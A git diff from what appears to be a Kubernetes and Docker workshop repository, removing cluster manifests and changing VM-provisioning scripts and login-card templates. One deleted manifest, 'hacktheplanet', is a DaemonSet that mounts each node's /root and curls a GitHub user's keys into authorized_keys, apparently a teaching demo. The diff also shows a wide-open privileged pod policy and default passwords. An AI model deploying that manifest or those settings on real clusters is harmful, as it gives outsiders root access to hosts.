fix-redirects.sh: adding forced redirect

k8s/elasticsearch-cluster.yaml

@@ -1,21 +0,0 @@
-apiVersion: enterprises.upmc.com/v1
-kind: ElasticsearchCluster
-metadata:
-  name: es
-spec:
-  kibana:
-    image: docker.elastic.co/kibana/kibana-oss:6.1.3
-    image-pull-policy: Always
-  cerebro:
-    image: upmcenterprises/cerebro:0.7.2
-    image-pull-policy: Always
-  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
-  image-pull-policy: Always
-  client-node-replicas: 2
-  master-node-replicas: 3
-  data-node-replicas: 3
-  network-host: 0.0.0.0
-  use-ssl: false
-  data-volume-size: 10Gi
-  java-options: "-Xms512m -Xmx512m"
-

k8s/elasticsearch-operator.yaml

@@ -1,94 +0,0 @@
-# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
----
-apiVersion: v1
-kind: Namespace
-metadata:
-  name: elasticsearch-operator
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: elasticsearch-operator
-rules:
-- apiGroups: ["extensions"]
-  resources: ["deployments", "replicasets", "daemonsets"]
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["apiextensions.k8s.io"]
-  resources: ["customresourcedefinitions"]
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["storage.k8s.io"]
-  resources: ["storageclasses"]
-  verbs: ["get", "list", "create", "delete", "deletecollection"]
-- apiGroups: [""]
-  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"] 
-  verbs: ["create", "get", "update", "delete", "list"]
-- apiGroups: ["batch"]
-  resources: ["cronjobs", "jobs"]
-  verbs: ["create", "get", "deletecollection", "delete"]
-- apiGroups: [""]
-  resources: ["pods"]
-  verbs: ["list", "get", "watch"]
-- apiGroups: ["apps"]
-  resources: ["statefulsets", "deployments"]
-  verbs: ["*"]
-- apiGroups: ["enterprises.upmc.com"]
-  resources: ["elasticsearchclusters"]
-  verbs: ["*"]
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: elasticsearch-operator
-subjects:
-- kind: ServiceAccount
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
----
-apiVersion: extensions/v1beta1
-kind: Deployment
-metadata:
-  name: elasticsearch-operator
-  namespace: elasticsearch-operator
-spec:
-  replicas: 1
-  template:
-    metadata:
-      labels:
-        name: elasticsearch-operator
-    spec:
-      containers:
-      - name: operator
-        image: upmcenterprises/elasticsearch-operator:0.2.0
-        imagePullPolicy: Always
-        env:
-        - name: NAMESPACE
-          valueFrom:
-            fieldRef:
-              fieldPath: metadata.namespace
-        ports:
-        - containerPort: 8000
-          name: http
-        livenessProbe:
-          httpGet:
-            path: /live
-            port: 8000
-          initialDelaySeconds: 10
-          timeoutSeconds: 10
-        readinessProbe:
-          httpGet:
-            path: /ready
-            port: 8000
-          initialDelaySeconds: 10
-          timeoutSeconds: 5
-      serviceAccount: elasticsearch-operator

k8s/filebeat.yaml

@@ -1,167 +0,0 @@
----
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: filebeat-config
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-data:
-  filebeat.yml: |-
-    filebeat.config:
-      inputs:
-        # Mounted `filebeat-inputs` configmap:
-        path: ${path.config}/inputs.d/*.yml
-        # Reload inputs configs as they change:
-        reload.enabled: false
-      modules:
-        path: ${path.config}/modules.d/*.yml
-        # Reload module configs as they change:
-        reload.enabled: false
-
-    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
-    #filebeat.autodiscover:
-    #  providers:
-    #    - type: kubernetes
-    #      hints.enabled: true
-
-    processors:
-      - add_cloud_metadata:
-
-    cloud.id: ${ELASTIC_CLOUD_ID}
-    cloud.auth: ${ELASTIC_CLOUD_AUTH}
-
-    output.elasticsearch:
-      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
-      username: ${ELASTICSEARCH_USERNAME}
-      password: ${ELASTICSEARCH_PASSWORD}
----
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: filebeat-inputs
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-data:
-  kubernetes.yml: |-
-    - type: docker
-      containers.ids:
-      - "*"
-      processors:
-        - add_kubernetes_metadata:
-            in_cluster: true
----
-apiVersion: extensions/v1beta1
-kind: DaemonSet
-metadata:
-  name: filebeat
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
-spec:
-  template:
-    metadata:
-      labels:
-        k8s-app: filebeat
-    spec:
-      serviceAccountName: filebeat
-      terminationGracePeriodSeconds: 30
-      containers:
-      - name: filebeat
-        image: docker.elastic.co/beats/filebeat-oss:7.0.1
-        args: [
-          "-c", "/etc/filebeat.yml",
-          "-e",
-        ]
-        env:
-        - name: ELASTICSEARCH_HOST
-          value: elasticsearch-es.default.svc.cluster.local
-        - name: ELASTICSEARCH_PORT
-          value: "9200"
-        - name: ELASTICSEARCH_USERNAME
-          value: elastic
-        - name: ELASTICSEARCH_PASSWORD
-          value: changeme
-        - name: ELASTIC_CLOUD_ID
-          value:
-        - name: ELASTIC_CLOUD_AUTH
-          value:
-        securityContext:
-          runAsUser: 0
-          # If using Red Hat OpenShift uncomment this:
-          #privileged: true
-        resources:
-          limits:
-            memory: 200Mi
-          requests:
-            cpu: 100m
-            memory: 100Mi
-        volumeMounts:
-        - name: config
-          mountPath: /etc/filebeat.yml
-          readOnly: true
-          subPath: filebeat.yml
-        - name: inputs
-          mountPath: /usr/share/filebeat/inputs.d
-          readOnly: true
-        - name: data
-          mountPath: /usr/share/filebeat/data
-        - name: varlibdockercontainers
-          mountPath: /var/lib/docker/containers
-          readOnly: true
-      volumes:
-      - name: config
-        configMap:
-          defaultMode: 0600
-          name: filebeat-config
-      - name: varlibdockercontainers
-        hostPath:
-          path: /var/lib/docker/containers
-      - name: inputs
-        configMap:
-          defaultMode: 0600
-          name: filebeat-inputs
-      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
-      - name: data
-        hostPath:
-          path: /var/lib/filebeat-data
-          type: DirectoryOrCreate
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: filebeat
-subjects:
-- kind: ServiceAccount
-  name: filebeat
-  namespace: kube-system
-roleRef:
-  kind: ClusterRole
-  name: filebeat
-  apiGroup: rbac.authorization.k8s.io
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: filebeat
-  labels:
-    k8s-app: filebeat
-rules:
-- apiGroups: [""] # "" indicates the core API group
-  resources:
-  - namespaces
-  - pods
-  verbs:
-  - get
-  - watch
-  - list
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: filebeat
-  namespace: kube-system
-  labels:
-    k8s-app: filebeat
----

k8s/hacktheplanet.yaml

@@ -1,34 +0,0 @@
-apiVersion: apps/v1
-kind: DaemonSet
-metadata:
-  name: hacktheplanet
-spec:
-  selector:
-    matchLabels:
-      app: hacktheplanet
-  template:
-    metadata:
-      labels:
-        app: hacktheplanet
-    spec:
-      volumes:
-      - name: root
-        hostPath:
-          path: /root
-      tolerations:
-      - effect: NoSchedule
-        operator: Exists
-      initContainers:
-      - name: hacktheplanet
-        image: alpine
-        volumeMounts:
-        - name: root
-          mountPath: /root
-        command:
-        - sh
-        - -c
-        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
-      containers:
-      - name: web
-        image: nginx
-

k8s/local-path-storage.yaml

@@ -1,110 +0,0 @@
-# This is a local copy of:
-# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
----
-apiVersion: v1
-kind: Namespace
-metadata:
-  name: local-path-storage
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: local-path-provisioner-service-account
-  namespace: local-path-storage
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRole
-metadata:
-  name: local-path-provisioner-role
-  namespace: local-path-storage
-rules:
-- apiGroups: [""]
-  resources: ["nodes", "persistentvolumeclaims"]
-  verbs: ["get", "list", "watch"]
-- apiGroups: [""]
-  resources: ["endpoints", "persistentvolumes", "pods"]
-  verbs: ["*"]
-- apiGroups: [""]
-  resources: ["events"]
-  verbs: ["create", "patch"]
-- apiGroups: ["storage.k8s.io"]
-  resources: ["storageclasses"]
-  verbs: ["get", "list", "watch"]
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: local-path-provisioner-bind
-  namespace: local-path-storage
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: local-path-provisioner-role
-subjects:
-- kind: ServiceAccount
-  name: local-path-provisioner-service-account
-  namespace: local-path-storage
----
-apiVersion: apps/v1beta2
-kind: Deployment
-metadata:
-  name: local-path-provisioner
-  namespace: local-path-storage
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: local-path-provisioner
-  template:
-    metadata:
-      labels:
-        app: local-path-provisioner
-    spec:
-      serviceAccountName: local-path-provisioner-service-account
-      containers:
-      - name: local-path-provisioner
-        image: rancher/local-path-provisioner:v0.0.8
-        imagePullPolicy: Always
-        command:
-        - local-path-provisioner
-        - --debug
-        - start
-        - --config
-        - /etc/config/config.json
-        volumeMounts:
-        - name: config-volume
-          mountPath: /etc/config/
-        env:
-        - name: POD_NAMESPACE
-          valueFrom:
-            fieldRef:
-              fieldPath: metadata.namespace
-      volumes:
-        - name: config-volume
-          configMap:
-            name: local-path-config
----
-apiVersion: storage.k8s.io/v1
-kind: StorageClass
-metadata:
-  name: local-path
-provisioner: rancher.io/local-path
-volumeBindingMode: WaitForFirstConsumer
-reclaimPolicy: Delete
----
-kind: ConfigMap
-apiVersion: v1
-metadata:
-  name: local-path-config
-  namespace: local-path-storage
-data:
-  config.json: |-
-        {
-                "nodePathMap":[
-                {
-                        "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
-                        "paths":["/opt/local-path-provisioner"]
-                }
-                ]
-        }
-

k8s/persistent-consul.yaml

@@ -1,95 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: consul
-rules:
-  - apiGroups: [ "" ]
-    resources: [ pods ]
-    verbs:     [ get, list ]
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: consul
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: Role
-  name: consul
-subjects:
-  - kind: ServiceAccount
-    name: consul
-    namespace: orange
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: consul
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: consul
-spec:
-  ports:
-  - port: 8500
-    name: http
-  selector:
-    app: consul
----
-apiVersion: apps/v1
-kind: StatefulSet
-metadata:
-  name: consul
-spec:
-  serviceName: consul
-  replicas: 3
-  selector:
-    matchLabels:
-      app: consul
-  volumeClaimTemplates:
-    - metadata:
-        name: data
-      spec:
-        accessModes:
-          - ReadWriteOnce
-        resources:
-          requests:
-            storage: 1Gi
-  template:
-    metadata:
-      labels:
-        app: consul
-    spec:
-      serviceAccountName: consul
-      affinity:
-        podAntiAffinity:
-          requiredDuringSchedulingIgnoredDuringExecution:
-            - labelSelector:
-                matchExpressions:
-                  - key: app
-                    operator: In
-                    values:
-                      - consul
-              topologyKey: kubernetes.io/hostname
-      terminationGracePeriodSeconds: 10
-      containers:
-        - name: consul
-          image: "consul:1.4.4"
-          volumeMounts:
-            - name: data
-              mountPath: /consul/data
-          args:
-            - "agent"
-            - "-bootstrap-expect=3"
-            - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
-            - "-client=0.0.0.0"
-            - "-data-dir=/consul/data"
-            - "-server"
-            - "-ui"
-          lifecycle:
-            preStop:
-              exec:
-                command:
-                - /bin/sh
-                - -c
-                - consul leave

k8s/psp-privileged.yaml

@@ -1,39 +0,0 @@
----
-apiVersion: policy/v1beta1
-kind: PodSecurityPolicy
-metadata:
-  name: privileged
-  annotations:
-    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
-spec:
-  privileged: true
-  allowPrivilegeEscalation: true
-  allowedCapabilities:
-  - '*'
-  volumes:
-  - '*'
-  hostNetwork: true
-  hostPorts:
-  - min: 0
-    max: 65535
-  hostIPC: true
-  hostPID: true
-  runAsUser:
-    rule: 'RunAsAny'
-  seLinux:
-    rule: 'RunAsAny'
-  supplementalGroups:
-    rule: 'RunAsAny'
-  fsGroup:
-    rule: 'RunAsAny'
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: psp:privileged
-rules:
-- apiGroups:     ['policy']
-  resources:     ['podsecuritypolicies']
-  verbs:         ['use']
-  resourceNames: ['privileged']
-

k8s/psp-restricted.yaml

@@ -1,38 +0,0 @@
----
-apiVersion: extensions/v1beta1
-kind: PodSecurityPolicy
-metadata:
-  annotations:
-    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
-    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
-    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
-    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
-  name: restricted
-spec:
-  allowPrivilegeEscalation: false
-  fsGroup:
-    rule: RunAsAny
-  runAsUser:
-    rule: RunAsAny
-  seLinux:
-    rule: RunAsAny
-  supplementalGroups:
-    rule: RunAsAny
-  volumes:
-  - configMap
-  - emptyDir
-  - projected
-  - secret
-  - downwardAPI
-  - persistentVolumeClaim
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: psp:restricted
-rules:
-- apiGroups:     ['policy']
-  resources:     ['podsecuritypolicies']
-  verbs:         ['use']
-  resourceNames: ['restricted']
-

k8s/users:jean.doe.yaml

@@ -1,33 +0,0 @@
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: jean.doe
-  namespace: users
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: users:jean.doe
-rules:
-- apiGroups: [ certificates.k8s.io ]
-  resources: [ certificatesigningrequests ]
-  verbs:     [ create ]
-- apiGroups:     [ certificates.k8s.io ]
-  resourceNames: [ users:jean.doe ]
-  resources:     [ certificatesigningrequests ]
-  verbs:         [ get, create, delete, watch ]
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRoleBinding
-metadata:
-  name: users:jean.doe
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: users:jean.doe
-subjects:
-- kind: ServiceAccount
-  name: jean.doe
-  namespace: users
-

k8s/volumes-for-consul.yaml

@@ -1,70 +0,0 @@
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node2
-  annotations:
-    node: node2
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node2
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node3
-  annotations:
-    node: node3
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node3
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node4
-  annotations:
-    node: node4
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node4
-

prepare-vms/lib/commands.sh

@@ -248,14 +248,6 @@ EOF"
              sudo tar -C /usr/local/bin -zx ship
     fi"
 
-    # Install the AWS IAM authenticator
-    pssh "
-    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
-	##VERSION##
-        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
-	sudo chmod +x /usr/local/bin/aws-iam-authenticator
-    fi"
-
     sep "Done"
 }
 
@@ -391,15 +383,6 @@ _cmd_retag() {
     aws_tag_instances $OLDTAG $NEWTAG
 }
 
-_cmd ssh "Open an SSH session to the first node of a tag"
-_cmd_ssh() {
-    TAG=$1
-    need_tag
-    IP=$(head -1 tags/$TAG/ips.txt)
-    info "Logging into $IP"
-    ssh docker@$IP
-}
-
 _cmd start "Start a group of VMs"
 _cmd_start() {
     while [ ! -z "$*" ]; do
@@ -498,12 +481,12 @@ _cmd_helmprom() {
     if i_am_first_node; then
         kubectl -n kube-system get serviceaccount helm ||
             kubectl -n kube-system create serviceaccount helm
-        sudo -u docker -H helm init --service-account helm
+        helm init --service-account helm
         kubectl get clusterrolebinding helm-can-do-everything ||
             kubectl create clusterrolebinding helm-can-do-everything \
                 --clusterrole=cluster-admin \
                 --serviceaccount=kube-system:helm
-        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
+        helm upgrade --install prometheus stable/prometheus \
             --namespace kube-system \
             --set server.service.type=NodePort \
             --set server.service.nodePort=30090 \

prepare-vms/lib/infra/aws.sh

@@ -31,7 +31,6 @@ infra_start() {
         die "I could not find which AMI to use in this region. Try another region?"
     fi
     AWS_KEY_NAME=$(make_key_name)
-    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
 
     sep "Starting instances"
     info "         Count: $COUNT"
@@ -39,11 +38,10 @@ infra_start() {
     info "     Token/tag: $TAG"
     info "           AMI: $AMI"
     info "      Key name: $AWS_KEY_NAME"
-    info " Instance type: $AWS_INSTANCE_TYPE"
     result=$(aws ec2 run-instances \
         --key-name $AWS_KEY_NAME \
         --count $COUNT \
-        --instance-type $AWS_INSTANCE_TYPE \
+        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
         --client-token $TAG \
         --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
         --image-id $AMI)
@@ -99,7 +97,7 @@ infra_disableaddrchecks() {
 }
 
 wait_until_tag_is_running() {
-    max_retry=100
+    max_retry=50
     i=0
     done_count=0
     while [[ $done_count -lt $COUNT ]]; do

prepare-vms/lib/ips-txt-to-html.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python3
+#!/usr/bin/env python
 import os
 import sys
 import yaml

prepare-vms/settings/admin-dmuc.yaml

@@ -5,7 +5,7 @@ clustersize: 1
 clusterprefix: dmuc
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: admin.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4

prepare-vms/settings/admin-kubenet.yaml

@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: kubenet
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: admin.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4

prepare-vms/settings/admin-kuberouter.yaml

@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: kuberouter
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: admin.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4

prepare-vms/settings/admin-test.yaml

@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: test
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: admin.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4

prepare-vms/settings/enix.yaml

@@ -0,0 +1,29 @@
+# Number of VMs per cluster
+clustersize: 1
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: enix.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.21.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
+

prepare-vms/settings/jerome.yaml

@@ -5,10 +5,10 @@ clustersize: 4
 clusterprefix: node
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: jerome.html
 
 # Use "Letter" in the US, and "A4" everywhere else
-paper_size: Letter
+paper_size: A4
 
 # Feel free to reduce this if your printer can handle it
 paper_margin: 0.2in

prepare-vms/settings/kube101.yaml

@@ -7,7 +7,7 @@ clustersize: 3
 clusterprefix: node
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: kube101.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter

prepare-vms/setup-admin-clusters.sh

@@ -1,20 +1,15 @@
 #!/bin/sh
 set -e
 
-export AWS_INSTANCE_TYPE=t3a.small
-
-INFRA=infra/aws-us-west-2
+INFRA=infra/aws-eu-west-3
 
 STUDENTS=2
 
-PREFIX=$(date +%Y-%m-%d-%H-%M)
-
-SETTINGS=admin-dmuc
-TAG=$PREFIX-$SETTINGS
+TAG=admin-dmuc
 ./workshopctl start \
 	--tag $TAG \
 	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
+	--settings settings/$TAG.yaml \
 	--count $STUDENTS
 
 ./workshopctl deploy $TAG
@@ -22,45 +17,37 @@ TAG=$PREFIX-$SETTINGS
 ./workshopctl kubebins $TAG
 ./workshopctl cards $TAG
 
-SETTINGS=admin-kubenet
-TAG=$PREFIX-$SETTINGS
+TAG=admin-kubenet
 ./workshopctl start \
 	--tag $TAG \
 	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
+	--settings settings/$TAG.yaml \
 	--count $((3*$STUDENTS))
 
-./workshopctl disableaddrchecks $TAG
 ./workshopctl deploy $TAG
 ./workshopctl kubebins $TAG
+./workshopctl disableaddrchecks $TAG
 ./workshopctl cards $TAG
 
-SETTINGS=admin-kuberouter
-TAG=$PREFIX-$SETTINGS
+TAG=admin-kuberouter
 ./workshopctl start \
 	--tag $TAG \
 	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
+	--settings settings/$TAG.yaml \
 	--count $((3*$STUDENTS))
 
-./workshopctl disableaddrchecks $TAG
 ./workshopctl deploy $TAG
 ./workshopctl kubebins $TAG
+./workshopctl disableaddrchecks $TAG
 ./workshopctl cards $TAG
 
-#INFRA=infra/aws-us-west-1
-
-export AWS_INSTANCE_TYPE=t3a.medium
-
-SETTINGS=admin-test
-TAG=$PREFIX-$SETTINGS
+TAG=admin-test
 ./workshopctl start \
 	--tag $TAG \
 	--infra $INFRA \
-	--settings settings/$SETTINGS.yaml \
+	--settings settings/$TAG.yaml \
 	--count $((3*$STUDENTS))
 
 ./workshopctl deploy $TAG
 ./workshopctl kube $TAG 1.13.5
 ./workshopctl cards $TAG
-

prepare-vms/templates/admin.html

@@ -0,0 +1,124 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://FIXME.container.training" -%}
+{%- set pagesize = 9 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine virtuelle" -%}
+    {%- set this_or_each = "cette" -%}
+    {%- set plural = "" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "chaque" -%}
+    {%- set plural = "s" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1em;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+p {
+    margin: 0.4em 0 0.4em 0;
+}
+
+img {
+    height: 4em;
+    float: right;
+    margin-right: -0.3em;
+}
+
+img.enix {
+    height: 4.0em;
+    margin-top: 0.4em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
+    <div>
+
+        <p>
+        Voici les informations permettant de se connecter à un
+        des environnements utilisés pour cette formation.
+        Vous pouvez vous connecter à {{ this_or_each }} machine
+        virtuelle avec n'importe quel client SSH.
+        </p>
+
+        <p>
+        <img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
+        <table>
+            <tr><td>cluster:</td></tr>
+            <tr><td class="logpass">{{ clusterprefix }}</td></tr>
+            <tr><td>identifiant:</td></tr>
+            <tr><td class="logpass">docker</td></tr>
+            <tr><td>mot de passe:</td></tr>
+            <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+        </table>
+        </p>
+
+        <p>
+       Adresse{{ plural }} IP :
+        <!--<img class="kube" src="{{ image_src }}" />-->
+        <table>
+            {% for node in cluster %}
+            <tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
+            {% endfor %}
+        </table>
+        </p>
+        <p>Le support de formation est à l'adresse suivante :
+            <center>{{ url }}</center>
+        </p>
+    </div>
+{% endfor %}
+</body>
+</html>

prepare-vms/templates/cards.html

@@ -1,88 +1,29 @@
 {# Feel free to customize or override anything in there! #}
-
-{%- set url = "http://FIXME.container.training/" -%}
-{%- set pagesize = 9 -%}
-{%- set lang = "en" -%}
-{%- set event = "training session" -%}
-{%- set backside = False -%}
-{%- set image = "kube" -%}
-{%- set clusternumber = 100 -%}
-
-{%- set image_src = {
-	"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
-	"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
-	"kube": "https://avatars1.githubusercontent.com/u/13629408",
-	"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
-    }[image] -%}
-{%- if lang == "en" and clustersize == 1 -%}
-	{%- set intro -%}
-	Here is the connection information to your very own
-	machine for this {{ event }}.
-	You can connect to this VM with any SSH client.
-	{%- endset -%}
-    {%- set listhead -%}
-    Your machine is:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en" and clustersize != 1 -%}
-	{%- set intro -%}
-	Here is the connection information to your very own
-	cluster for this {{ event }}.
-	You can connect to each VM with any SSH client.
-	{%- endset -%}
-    {%- set listhead -%}
-    Your machines are:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" and clustersize == 1 -%}
-	{%- set intro -%}
-	Voici les informations permettant de se connecter à votre
-	machine pour cette formation.
-	Vous pouvez vous connecter à cette machine virtuelle
-	avec n'importe quel client SSH.
-	{%- endset -%}
-    {%- set listhead -%}
-    Adresse IP:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en" and clusterprefix != "node" -%}
-	{%- set intro -%}
-    Here is the connection information for the
-    <strong>{{ clusterprefix }}</strong> environment.
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" and clustersize != 1 -%}
-	{%- set intro -%}
-	Voici les informations permettant de se connecter à votre
-	cluster pour cette formation.
-	Vous pouvez vous connecter à chaque machine virtuelle
-	avec n'importe quel client SSH.
-	{%- endset -%}
-    {%- set listhead -%}
-	Adresses IP:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "en"  -%}
-	{%- set slides_are_at -%}
-	You can find the slides at:
-	{%- endset -%}
-{%- endif -%}
-{%- if lang == "fr" -%}
-	{%- set slides_are_at -%}
-  	Le support de formation est à l'adresse suivante :
-	{%- endset -%}
+{%- set url = "http://container.training/" -%}
+{%- set pagesize = 12 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
